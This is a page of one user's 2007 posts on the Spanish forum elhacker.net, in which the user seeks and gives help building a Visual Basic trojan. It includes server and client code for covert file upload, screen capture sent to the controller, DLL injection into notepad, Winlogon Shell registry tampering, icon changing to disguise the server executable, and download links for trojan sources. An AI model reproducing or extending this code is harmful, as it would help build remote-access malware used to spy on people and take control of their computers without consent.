elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22 23 24 25
201  Programación / Programación Visual Basic / Re: conexion lenta con el csocketmaster en: 27 Julio 2007, 14:29 pm
pos nop, no es el pb lo e kitado y seguia tardando lo mismo. me ta volviendo loco -.-
202  Programación / Programación Visual Basic / Re: conexion lenta con el csocketmaster en: 26 Julio 2007, 20:54 pm
ok, tonces es problema de mi codigo. en el cliente si que uso el mswinsck.ocx. pue si, incluso indectandome a mi mismo tarda tanto tiempo.

el codigo de subir y bajar archivos es este:

en el server:
Código
  1. If Envio = True Then
  2.    Llegada = Llegada & data
  3.    If Len(Llegada) = lenFile Then
  4.        Open Dir1.Path & "\" & nombreRecibido For Binary As #1
  5.        Put #1, , Llegada
  6.        Close #1
  7.        Llegada = ""
  8.        Envio = False
  9.        ws.SendData "ok recibido"
  10.    End If
  11.    Exit Sub
  12. End If
  13. vData = Split(data, "|")
  14.  
  15. Select Case vData(0) 'Empezamos los casos
  16. Case "subir" 'Recibe nombre y tamaño del archivo
  17. lenFile = vData(1)
  18. nombreRecibido = vData(2)
  19. Envio = True
  20. data = ""
  21. ws.SendData "SendFile"
  22. Exit Sub
  23.  

y en el cliente:

Código
  1. Case "SendFile" 'Enviamos el archivo a subir
  2.    On Error Resume Next
  3.    Frm_File.pb.Value = 0
  4.  
  5.    vIndex = Split(Lv.SelectedItem.Key, "|")
  6.    Dim Send As String
  7.  
  8.    Open RutaSubida For Binary As #1
  9.    Dim Todo As String
  10.        Todo = Space(LOF(1))
  11.        Get #1, , Todo
  12.    Close #1
  13.  
  14.    Frm_File.pb.Max = Len(Todo)
  15.  
  16.    For o = 1 To Len(Todo) 'Leemos el archivo de 10 en 10 bit's
  17.        Dim Porciento As Integer 'Para que apareza el porcentaje de descarga
  18.        Porciento = o / Len(Todo) * 100
  19.        Frm_File.lblEstado.Caption = "Subido:" & Porciento & "%"
  20.        Parte = Mid(Todo, o, 10)
  21.        o = o + 9
  22.        Ws(vIndex(0)).SendData Parte 'Enviamos los 10 bit's
  23.        Frm_File.pb.Value = o  'Para hacer avanzar la barra de progreso
  24.        Sleep 1
  25.    Next o
  26.  
  27.  
  28. Case "ok recibido" 'Nos indica q el archivo a llegado
  29.    MsgBox "Archivo enviado correctamente.", vbOKOnly
  30.    Frm_File.lblEstado.Caption = ""
  31.    Frm_File.pb.Value = 0

Bien este es el code que uso para subir archivos. es = que el ejemplo que subio eon. lo e intentado adaptar a mi troya, que ma costao lo mio, pero al final funciona. Gracias EON, ue grande eres xD.

weno, a ver si alguien sabe por que el motivo de la lentitud., puede ser que envia de 10 en 10 bits? aunque me parece que es demasiado tiempo para tan poca cosa
Gracias
203  Programación / Programación Visual Basic / conexion lenta con el csocketmaster en: 26 Julio 2007, 14:03 pm
wenas, aver os komento un pequeño problema que tengo. el server de mi troyano lo e hecho con el moculo csocketmaster, pero la conexion es lentisima. para subir un archivo de 145 kb en local tarda sin exagerar unos 2 minutos. queria saber si esto es normal, o se debe a un fallo en mi codigo.
gracaias

PD. para no empezar otro post me acabo de acordar de un problema con el troya. sin lo uso en red local, se conecta perfectamente, pero si conecta desde fuera del router no conecta bien. me explico:
cuando recibo una conexion, muestra un form a lo msn con el nombre del pc que se conecta y reproduce un sonido. si lo ejecito el LAN funciona a las 1000, exceptuando el problema de lentitud. si se lo mando a mi novia(que es la encargada de pruebas xD) solo me muestra el form y reproduce el sonido, pero no muestra nombre ni nda, con lo cual no puedo acer nada. digamos que solo recibe la conexion, pero no establece.

Alguna idea de por que puede ser?

Muchas thanks xD
204  Programación / Programación Visual Basic / Re: Mi primer troyano en VB6.0 en: 25 Julio 2007, 22:21 pm
http://www.freefilehosting.net/files/NDc3OA==
205  Programación / Programación Visual Basic / Re: Mi primer troyano en VB6.0 en: 25 Julio 2007, 20:55 pm
yo solo te puedo responder al cjpg,. de lo demas ni idea, aunque creo que ami me pasa algo parecido tb.

lo del jpg yo lo hago de esta manera, que creoq ue es la correcta(almenos funciona xD)

en el formulario declaro:
Código
  1. Dim Foto As New Class1 'Class1 es el nombre del module de clase cjpg.


depues en data arrival tengo esto:

Código
  1. Case "Screen"
  2. Resolucion = vData(1)
  3. Foto.SetSamplingFrequencies 2, 2, 2, 2, 2, 2
  4. Foto.Quality = Resolucion   'aqui ajustas la calidad dsd 1 a 100 hasi bajas calidad bajas peso
  5. Foto.SampleScreen
  6. Foto.SaveFile ("c:\capture.jpg")
  7. ws.SendData "tamscreen|" & FileLen("C:\capture.jpg")

la resolucion la mando desde el cliente, pero puedes ajustarla aki si queieres.

este es el metodo que uso yo. conn esto solo consiguo un pantallazo de lo que esta haciendo. a ver si encuentro otro modulo para tomar capturas, que era mas rapido que el cjpg(creo, lo lei por aquie hace dias), ya que con el modulo del csocketmaster, la conexsion es lentisima, incluso en local.

espero aberte ayudado


PD: para el editor de server, te dejo un source que hize siguiendo el manual de warghost. espero que te sirva.

Código:
http://rapidshare.com/files/45004307/editor-server.rar
206  Programación / Programación Visual Basic / Re: codigo fuente msn en: 24 Julio 2007, 21:11 pm
trojanfrance

sio no recuerdo mal ay abia code de msnfake, que creo que es lo que kieres tu.
207  Programación / Programación Visual Basic / Re: [Source] Inyeccion Dll en VB en: 23 Julio 2007, 21:36 pm
gracias, pero me tira error, variable no definida :
DLL_PROCESS_DETACH

para poner color en los codigos, a  la derecha del boton con la A roja ay un desplegable, ay seleccionas el lenguaje  y pegas el codigo dentro de las etiketas.

me puedes explicar como va ese code?

gracias
208  Programación / Programación Visual Basic / Re: [Source] Inyeccion Dll en VB en: 23 Julio 2007, 20:58 pm
muy bueno hendrix, e estado leyendo y probando el codigo. la duda que tengo es que como puedo hacer para que el notepad, en sete caso, llame a una funcion de la dll. e seguido el tutorial de crear una dll, que posteo EON, y tengo una dll con una funcion, que cuando es llamada, muestra un mensaje. si creo un proyecto y llamo a esa dll
asi:
Código
  1. Private Declare Function Wenas Lib "Prueba.dll" () As String
  2.  
  3. Private sub Form_Load()
  4. dim msg as string
  5. msg = Wenas
  6. msg = MTrim(msg)
  7. msgbox msg
  8. End Sub

de esta manera al generar el proyecto, me muestra el mensaje que e puesto en la funcion de la dll. mi duda es como llamar a esa funcion, o que se ejecute sola, al cargarse en elproceso.

Muchas gracias, y muy weno hendix.
209  Programación / Programación Visual Basic / Re: Consulta en: 17 Julio 2007, 16:54 pm
yo lo que hacia para cambia el nombre era editar el explorer. exe con el reshack y buscaba el valor inicio, logo lo moidificaba y loguardaba como explorer2.exe

lo en el registro en:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\Winlogon\
en la clave Shell, modificaba el explorer.exe por explorer2.exe y reiniciaba. es un metodo un poc xapucero, pero lo lei hace muxo y decidi probarlo.

espro que te sirva
210  Programación / Programación Visual Basic / Problema con iconchanger en: 15 Julio 2007, 21:57 pm
weno pos en mi proyecto, al extraer un recursos como exe e intentar cambiar el icono, me tira un error el vb:
Error de compilacion:
No se a definido el tipo definido por el usuario

me salta en esta linea:
Dim Icons() As IconDescriptor

que puede ocurrir?
el modulo del iconchanger lo e sacado del catus de mad, y lo llamo asi:

If ckIcon = 1 Then
Dim eRR As String
ReplaceIcons Cd.FileName, App.Path & "Server.exe", eRR
End If

Gracias
Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22 23 24 25
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines